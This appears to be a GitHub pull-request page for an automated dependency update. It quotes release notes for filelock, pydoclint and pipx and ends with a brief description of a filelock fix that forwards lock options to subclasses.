[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#659](https://redirect.github.com/tox-dev/filelock/pull/659)
- 🐛 fix(soft): detect a reused PID via process start time by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#660](https://redirect.github.com/tox-dev/filelock/pull/660)
- 🔒 fix(soft): fail safe on transient heartbeat errors by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#661](https://redirect.github.com/tox-dev/filelock/pull/661)
- 📝 docs: state the lock trust boundaries once by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#663](https://redirect.github.com/tox-dev/filelock/pull/663)
- 👷 ci(perf): add the performance and NFS matrix by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#664](https://redirect.github.com/tox-dev/filelock/pull/664)
- Replace prettier with mdformat and yamlfmt by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#667](https://redirect.github.com/tox-dev/filelock/pull/667)
- 👷 ci(matrix): add SMB, capability, and matrix docs by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#665](https://redirect.github.com/tox-dev/filelock/pull/665)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.29.7...3.30.0>
</details>
<details>
<summary>jsh9/pydoclint (jsh9/pydoclint)</summary>
###
[`v0.9.1`](https://redirect.github.com/jsh9/pydoclint/blob/HEAD/CHANGELOG.md#091---2026-07-03)
[Compare
Source](https://redirect.github.com/jsh9/pydoclint/compare/0.9.0...0.9.1)
- Fixed
- Restored numpy docstring default checking with
`docstring_parser_fork==0.0.16`, which preserves raw parameter and
attribute type declarations while still exposing normalized type/default
fields
- Changed
- Replaced tox type checking from `mypy` with `ty` and fixed the
surfaced
typing issues with explicit type narrowing
- Run the `tox -e pydoclint` self-check against the local package
instead of
the latest published pydoclint release
- Updated Muff tooling to `0.15.20` and added a pre-commit hook to keep
the
tox Muff pins in sync with the `muff-pre-commit` revision
- Full diff
- <https://github.com/jsh9/pydoclint/compare/0.9.0...0.9.1>
###
[`v0.9.0`](https://redirect.github.com/jsh9/pydoclint/blob/HEAD/CHANGELOG.md#091---2026-07-03)
[Compare
Source](https://redirect.github.com/jsh9/pydoclint/compare/0.8.7...0.9.0)
- Fixed
- Restored numpy docstring default checking with
`docstring_parser_fork==0.0.16`, which preserves raw parameter and
attribute type declarations while still exposing normalized type/default
fields
- Changed
- Replaced tox type checking from `mypy` with `ty` and fixed the
surfaced
typing issues with explicit type narrowing
- Run the `tox -e pydoclint` self-check against the local package
instead of
the latest published pydoclint release
- Updated Muff tooling to `0.15.20` and added a pre-commit hook to keep
the
tox Muff pins in sync with the `muff-pre-commit` revision
- Full diff
- <https://github.com/jsh9/pydoclint/compare/0.9.0...0.9.1>
###
[`v0.8.7`](https://redirect.github.com/jsh9/pydoclint/blob/HEAD/CHANGELOG.md#090---2026-06-29)
[Compare
Source](https://redirect.github.com/jsh9/pydoclint/compare/0.8.6...0.8.7)
- Fixed
- A `DOC404` false positive for single-argument `Generator[YieldType]`
annotations, where pydoclint compared the docstring yield type with the
whole annotation instead of the generator yield type
- Return/yield handling for one- and two-argument `Generator[...]`
annotations so omitted return types default to `None` per PEP-696
- Full diff
- <https://github.com/jsh9/pydoclint/compare/0.8.7...0.9.0>
</details>
<details>
<summary>pypa/pipx (pipx)</summary>
###
[`v1.16.2`](https://redirect.github.com/pypa/pipx/releases/tag/1.16.2)
[Compare
Source](https://redirect.github.com/pypa/pipx/compare/1.16.1...1.16.2)
<!-- Release notes generated using configuration in .github/release.yml
at 1.16.2 -->
#### What's Changed
- 👷 ci: test against Python 3.15 beta by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1971](https://redirect.github.com/pypa/pipx/pull/1971)
**Full Changelog**:
<https://github.com/pypa/pipx/compare/1.16.1...1.16.2>
###
[`v1.16.1`](https://redirect.github.com/pypa/pipx/releases/tag/1.16.1)
[Compare
Source](https://redirect.github.com/pypa/pipx/compare/1.16.0...1.16.1)
<!-- Release notes generated using configuration in .github/release.yml
at 1.16.1 -->
#### What's Changed
- 📝 docs: strip the prompt from copied console snippets by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1962](https://redirect.github.com/pypa/pipx/pull/1962)
- 🐛 fix: don't crash scanning a foreign binary in the bin dir by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1970](https://redirect.github.com/pypa/pipx/pull/1970)
**Full Changelog**:
<https://github.com/pypa/pipx/compare/1.16.0...1.16.1>
###
[`v1.16.0`](https://redirect.github.com/pypa/pipx/releases/tag/1.16.0)
[Compare
Source](https://redirect.github.com/pypa/pipx/compare/1.15.2...1.16.0)
<!-- Release notes generated using configuration in .github/release.yml
at 1.16.0 -->
##### What's Changed
- 📝 docs: restore the 1.16.0 changelog fragments by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1961](https://redirect.github.com/pypa/pipx/pull/1961)
**Full Changelog**:
<https://github.com/pypa/pipx/compare/1.15.2...1.16.0>
###
[`v1.15.2`](https://redirect.github.com/pypa/pipx/releases/tag/1.15.2)
[Compare
Source](https://redirect.github.com/pypa/pipx/compare/1.15.1...1.15.2)
<!-- Release notes generated using configuration in .github/release.yml
at 1.15.2 -->
**Full Changelog**:
<https://github.com/pypa/pipx/compare/1.15.1...1.15.2>
###
[`v1.15.1`](https://redirect.github.com/pypa/pipx/releases/tag/1.15.1)
[Compare
Source](https://redirect.github.com/pypa/pipx/compare/1.15.0...1.15.1)
<!-- Release notes generated using configuration in .github/release.yml
at 1.15.1 -->
#### What's Changed
- Keep trash cleanup non-fatal for locked files by
[@​cyphercodes](https://redirect.github.com/cyphercodes) in [#&
> ✂ **Note**
>
> PR body was truncated to here.
---------
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: ansibuddy <107943535+ansibuddy@users.noreply.github.com>
Co-authored-by: tanwigeetika1618 <tengverified@gmail.com>
Co-authored-by: tanwigeetika1618 <84617407+tanwigeetika1618@users.noreply.github.com>
This was referenced Aug 26, 2026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Filelock discarded non-default safety options when a subclass narrowed its
__init__signature, and subclasses with**kwargsdid not receive base lock options. Construction returned an instance whose behavior differed from the requested policy. This closes issue #628.Filelock now forwards all options to keyword-capable subclasses and rejects unsupported non-default options for narrow constructors. A weak, locked per-subclass signature cache preserves dynamic class reclamation and cuts repeated construction from 28.3 µs to 2.31 µs on Python 3.14.6.